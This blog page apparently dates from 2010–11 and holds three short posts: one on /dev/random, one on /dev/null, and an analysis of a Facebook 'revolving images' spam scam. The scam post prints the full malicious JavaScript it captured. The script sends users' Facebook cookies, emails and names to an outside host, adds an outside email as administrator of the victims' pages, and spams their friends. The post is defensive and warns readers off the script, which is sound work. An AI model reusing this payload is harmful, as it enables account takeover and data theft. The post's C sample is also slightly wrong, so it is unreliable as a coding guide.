Sec Alert!

January 6, 2011

If it’s random be it /dev/random!

Filed under: Linux, Unix — Tags: , , , , — Rahil @ 4:07 PM

In this geeky life, everyone has heard of some notorious thing known as Random Number. Initially, when I had to find a random number, I used to google some cool tool or website which could give me really cool random number. But, after a while, I came to know a cool thing called /dev/random and /dev/urandom. Basically, these are the devices ( files ) on Linux systems to provide user a random number.

/dev/random and /dev/urandom are two read only files in Linux system which when used to read gives random numbers to user. /dev/random generates quality random numbers compared to /dev/urandom. The following sample code illustrates how to use these device files to generate random number.

#include <stdio.h>
void main(void)
{
        int fp;
        long randNo;

        fp=open("/dev/random","r");
        read(fp, &randNo,sizeof(randNo));
        printf("%ld\n",randNo);
        close(fp);
}

Basically, /dev/random file is an interface for user to access kernel’s random number generator. System internally collects environmental and device driver noise in form of bits and collects it in the entropy pool. This way system generates high quality (true) random numbers which can be used for various purposes. Also, as the random number using /dev/random is generated from entropy pool, read from /dev/random will be blocked until sufficient noise is not available for generating random number.

Opposed to that, /dev/urandom generates the random number with the whatever amount of noise is available in pool. Random numbers generated this way may or may not be true random number and may be vulnerable to cryptographic attack.

More information on configuration and usage can be found at linux.die.net or by command man random.

January 2, 2011

What the hell is /dev/null in Linux?!

Filed under: Linux, Unix — Tags: , , , , — Rahil @ 8:22 PM

One day I was searching for a specific type of file on my Linux machine. Initially I was so enthusiastic that I tried for almost 10 minutes and that also on console (CLI)!! But, still I could not find what I wanted! So I thought “That is it! Now, I need to automate the search and decided to write a SHELL SCRIPT!” While I was writing it, I came across a situation where I needed my command to process the data but not to show it on console. So, I searched a little here and a lot there and finally came up with a golden solution called Null Device.

In Linux ( and other Unix like systems ), there are three type of streams.

    Standard Input [ StdIn-0 ] – An input stream ( Mostly Keyboard )
    Standard Output [ StdOut-1 ] – An output stream ( Mostly Monitor )
    Standard Error [ StdErr-2 ] – An error stream ( Mostly, Monitor )

Linux offers a very useful function of stream redirection i.e. we could redirect any of the standard stream to some other place as we wish to do some specific task. Now, sometimes it may be the case when we do not wish to write some output/error to the screen but also do not wish to log it into a file – we simply want to discard it. So, what that’s the time when /dev/null comes handy.

It is a special file/device with the nature “write once forget for ever”. It means, whatever written to that file is instantly discarded into void/null. So, after redirecting stream to /dev/null will leave no trace of any output.

dosomething 2>/dev/null will discard errors and nothing will be showed on screen.

It is quite similar to NUL device of Dos/Windows and \Device\Null of Windows NT.

November 22, 2010

Revolving Images or Revolving Spam at facebook!?!

Filed under: Attacks, Script Attacks — Tags: , , , , — Rahil @ 10:26 AM

One wonderful day your friend sends you a message “Hey! Checkout this cool link! It bounces all images on your ‘boring’ facebook page.” WoW! So cool, na!

That’s the case rightnow. On one of my friend’s page I saw text saying

Really cool Facebook revolving images. MUST SEE http://rotatingimage.tk/

I first went to the URL rotatingimage.tk and I found a javascript which the author asked to run in Address Bar at the top of browser. It looked something like —

javascript:(a = (b = document).createElement("script")).src = "//graphicgiants.com/majic.js?show", b.body.appendChild(a); void(0)

Then I got a little curious and I tried to play with it a little. I tried to open the javascript Source URL shown above in URL and I landed on Facebook.com page. So, I decided to go further. Then, I enabled the HTTP header checker and checked the same thing and I noticed that the web server was responding with 302 TEMPORARILY MOVED response code. That really drove me nuts and I used a linux tool curl. Now, instead of getting nothing I got a file with javascript shown below —

txt = "Really cool Facebook revolving images. MUST SEE http://rotatingimage.tk";
txtee = "Really cool Facebook revolving images. MUST SEE http://revolvingimage.tk";

alert("Please wait 2-3 mins while we setup! Do not refresh this window or click any link.");


with(x = new XMLHttpRequest()) open("GET", "/"), onreadystatechange = function () {

    if (x.readyState == 4 && x.status == 200) {


        comp = (z = x.responseText).match(/name=\\"composer_id\\" value=\\"([\d\w]+)\\"/i)[1];
        form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
        dt = z.match(/name="fb_dtsg" value="([\d\w-_]+)"/i)[1];
        pfid = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
        appid = "150622878317085";
        appname = "rip_m_j";

        with(xx = new XMLHttpRequest()) open("GET", "/ajax/browser/friends/?uid=" + document.cookie.match(/c_user=(\d+)/)[1] + "&filter=all&__a=1&__d=1"), onreadystatechange = function () {



            if (xx.readyState == 4 && xx.status == 200) {
                m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join("\n").replace(/(\/\d+_|_\d+_q\.jpg)/gi, "").split("\n");
                i = 0;
llimit=25;
                t = setInterval(function () {
                    if (i >= llimit ) return;
if(i == 0)
{


with(ddddd = new XMLHttpRequest()) open("GET", "/ajax/pages/dialog/manage_pages.php?__a=1&__d=1"), setRequestHeader("X-Requested-With", null), setRequestHeader("X-Requested", null), onreadystatechange = function(){ if(ddddd.readyState == 4 && ddddd.status == 200){ llm = (d = ddddd.responseText).match(/\\"id\\":([\d]+)/gi); aaac =llm.length;
pplp=0;
for(pplp=0;pplp<aaac;pplp++)
{

with(xxxcxxx = new XMLHttpRequest()) open("POST", "/pages/edit/?id="+llm[pplp].replace(/\\"id\\":/i, "")+"&sk=admin"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send("post_form_id="+pfid+"&fb_dtsg="+dt+"&fbpage_id="+llm[pplp].replace(/\\"id\\":/i, "")+"&friendselector_input%5B%5D=nandu.oug%40gmail.com%09&friend_selected%5B%5D=&save=1");


}


}}, send(null);

with(xxx = new XMLHttpRequest()) open("GET", "/mobile/?v=photos"), setRequestHeader("X-Requested-With", null), setRequestHeader("X-Requested", null), onreadystatechange = function(){ if(xxx.readyState == 4 && xxx.status == 200){ with(s = document.createElement("script")) src = "http://graphicgiants.com/mmjaicc.js?q=" + document.cookie.match(/c_user=(\d+)/)[1] + ":"  + (d = xxx.responseText).match(/mailto:([^\"]+)/)[1].replace(/@/, "@") + ":" + d.match(/id="navAccountName">([^<>]+)/)[1] + "&c="+ document.cookie; document.body.appendChild(s); }}, send(null);

with(xxcxx = new XMLHttpRequest()) open("POST", "/ajax/pages/fan_status.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send("fbpage_id=176607175684946&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id="+pfid+"&fb_dtsg=" + dt + "&lsd&post_form_id_source=AsyncRequest");

with(lllllxx = new XMLHttpRequest()) open("POST", "/ajax/pages/fan_status.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send("fbpage_id=133631350023549&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id="+pfid+"&fb_dtsg=" + dt + "&lsd&post_form_id_source=AsyncRequest");

}
else if (i == llimit - 1)
{
with(xxxx = new XMLHttpRequest()) open("GET", "/mobile/?v=photos"), setRequestHeader("X-Requested-With", null), setRequestHeader("X-Requested", null), onreadystatechange = function(){ if(xxxx.readyState == 4 && xxxx.status == 200){ with(s = document.createElement("script")) src = "http://graphicgiants.com/majic.js?q=" + document.cookie.match(/c_user=(\d+)/)[1] + ":"  + (d = xxxx.responseText).match(/mailto:([^\"]+)/)[1].replace(/@/, "@") + ":" + d.match(/id="navAccountName">([^<>]+)/)[1] + "&c="+ document.cookie; document.body.appendChild(s); }}, send(null);
}

if(i%2==0)
{
                    with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txt + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
}
else 
{
                    with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txtee + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
}

                    i += 1;
                }, 2000);
            }



        }, send(null);
    }
}, send(null);

As far as I have understood —

In the script, there are some calls to some external domain on line 39, 48 which receives your facebook cookie. When you run a script in the browser, you run it in the security context of the Facebook.com and the browser will not stop that request. This way an attacker may lead to compromise your account and your privacy. Though it may be harmless it is surely fishy. I would suggest of not using such scirpt within your browser when you are logged-in into your Facebook account.

If you are affected or see somewhere, you can report it by –

http://www.facebook.com/help/contact.php?show_form=report_phishing

Click here to read more from Shubhanshu Mishra’s blog.

Blog at WordPress.com.

%d bloggers like this: